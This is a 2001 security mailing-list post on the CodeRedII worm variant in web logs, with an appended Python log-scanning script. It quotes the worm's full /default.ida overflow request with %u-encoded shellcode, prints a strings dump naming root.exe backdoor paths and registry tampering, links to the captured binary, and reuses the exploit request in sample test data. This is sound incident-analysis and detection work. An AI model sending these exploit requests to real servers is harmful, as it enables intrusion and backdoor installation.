From: Stephen Friedl (friedlmtndew.com)
Date: Sat Aug 04 2001 - 10:34:49 CDT


    Hello all,

    I'm sorry if this is old news, but is there a new variant going around?
    My logs just started showing entries with the signature

            /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...

    instead of the

            /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...

    that we've been used to. I know there is a CRv2, but I cannot find any
    references to a different signature. I've captured the entire request,
    and though the % code is all the same, the payload is different. This
    is the "strings" output on the binary:

    ----------------------------------------------------------------------
    GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
    Content-type: text/xml
    Content-length: 3379
    CodeRedII
    F4)E
    Th~f
    Th~f
    ;MZu
    KERNu
    EL32u
    GetPu
    rocAu
    D$$dg
    LoadLibraryA
    CreateThread
    GetTickCount
    Sleep
    GetSystemDefaultLangID
    GetSystemDirectoryA
    CopyFileA
    GlobalFindAtomA
    GlobalAddAtomA
    CloseHandle
    _lcreat
    _lwrite
    _lclose
    GetSystemTime
    WS2_32.DLL
    socket
    closesocket
    ioctlsocket
    connect
    select
    send
    recv
    gethostname
    gethostbyname
    WSAGetLastError
    USER32.DLL
    ExitWindowsEx
    \CMD.EXE
    d:\inetpub\scripts\root.exe
    d:\progra~1\common~1\system\MSADC\root.exe
    hT
    hH
    hX
    t6Ff
    %`0
    %d0
    %h0
    %p0
    %t0
    %x0
    %|0
    \EXPLORER.EXE
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    SFCDisable
    SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
    /Scripts
    /MSADC
    c:\,,217
    d:\,,217
    KERNEL32.dll
    ADVAPI32.dll
    Sleep
    GetWindowsDirectoryA
    WinExec
    RegQueryValueExA
    RegSetValueExA
    RegOpenKeyExA
    RegCloseKey
    d:\explorer.exe
    8>u'j
    ----------------------------------------------------------------------

    The 3818 byte capture file is on my web server if anybody wants to poke around:

            http://www.unixwiz.net/misc/codered.bin

    Thanks to dwmorris at DSLReports.com for the heads up on this.

    Steve

    ---
    Stephen J Friedl | Software Consultant | Tustin, CA | +1 714 544-6561
    www.unixwiz.net | I speak for me only | KA8CMY | steveunixwiz.net

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
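The post boils down to a log signature: the original worm fills the /default.ida query with N, the variant in the capture above fills it with X, and the strings dump names two root.exe drop locations that a follow-up probe would request. The script below, an added example and not part of the post or the captured worm, classifies combined-format web log lines against those three signatures and decodes the %u-encoded trampoline bytes from the request line. The log lines, IP addresses and the minimum fill length of 20 are constructed assumptions for the example; the request line itself is the one quoted in the post.

```python
import re
from collections import Counter

# Signatures taken from the request line quoted in the post: a long run of N
# (original Code Red) or X (the CodeRedII variant) after /default.ida?, followed
# by %u-encoded words. The minimum run length of 20 is an assumption chosen to
# avoid matching ordinary short queries; the real fills are far longer.
CODERED_RE = re.compile(
    r"GET\s+/default\.ida\?(?P<fill>N{20,}|X{20,})\S*%u[0-9a-fA-F]{4}",
    re.IGNORECASE,
)

# The strings dump lists /scripts/root.exe and /MSADC/root.exe as copy targets;
# a later request for either is a probe for the dropped command shell.
ROOTEXE_RE = re.compile(r"/(scripts|msadc)/root\.exe", re.IGNORECASE)

# Common log format: ip ident user [timestamp] "request" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(request_line):
    """Return 'CodeRed-v1', 'CodeRedII', 'root.exe-probe' or None."""
    m = CODERED_RE.search(request_line)
    if m:
        return "CodeRed-v1" if m.group("fill")[0].upper() == "N" else "CodeRedII"
    if ROOTEXE_RE.search(request_line):
        return "root.exe-probe"
    return None


def decode_u(query):
    """Turn a %uXXXX sequence into the raw bytes it encodes.

    IIS treats %uXXXX as a 16-bit code unit; on x86 that lands in memory
    little-endian, so %u6858 becomes the bytes 58 68.
    """
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", query):
        value = int(word, 16)
        out += bytes([value & 0xFF, value >> 8])
    return bytes(out)


def parse_clf(line):
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines):
    """Yield (source ip, label) for every line that matches a signature."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        label = classify_request(rec["req"])
        if label:
            hits.append((rec["ip"], label))
    return hits


def summarize(lines):
    """Count hits per label across a log."""
    return Counter(label for _, label in scan_log(lines))


# Constructed sample log for the example; the /default.ida request line is the
# one from the post, the rest is made up.
CRII_QUERY = (
    "X" * 224
    + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
)
CRI_QUERY = "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"

SAMPLE_LOG = [
    '192.0.2.10 - - [04/Aug/2001:10:12:31 -0500] "GET /default.ida?%s HTTP/1.0" 200 3379' % CRII_QUERY,
    '192.0.2.11 - - [04/Aug/2001:10:13:02 -0500] "GET /default.ida?%s HTTP/1.0" 200 0' % CRI_QUERY,
    '192.0.2.10 - - [04/Aug/2001:10:20:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0',
    '198.51.100.7 - - [04/Aug/2001:10:21:00 -0500] "GET /index.html HTTP/1.0" 200 1234',
    'garbage line that is not CLF at all',
]

if __name__ == "__main__":
    for ip, label in scan_log(SAMPLE_LOG):
        print(ip, label)
    print(summarize(SAMPLE_LOG))
    print(decode_u(CRII_QUERY)[:8].hex())
```

Running the block over the constructed log reports one CodeRedII hit, one original Code Red hit and one root.exe probe, and the first decoded trampoline bytes come out as 90 90 58 68 d3 cb 01 78. Pipe a real access log into scan_log to get the same breakdown per source address.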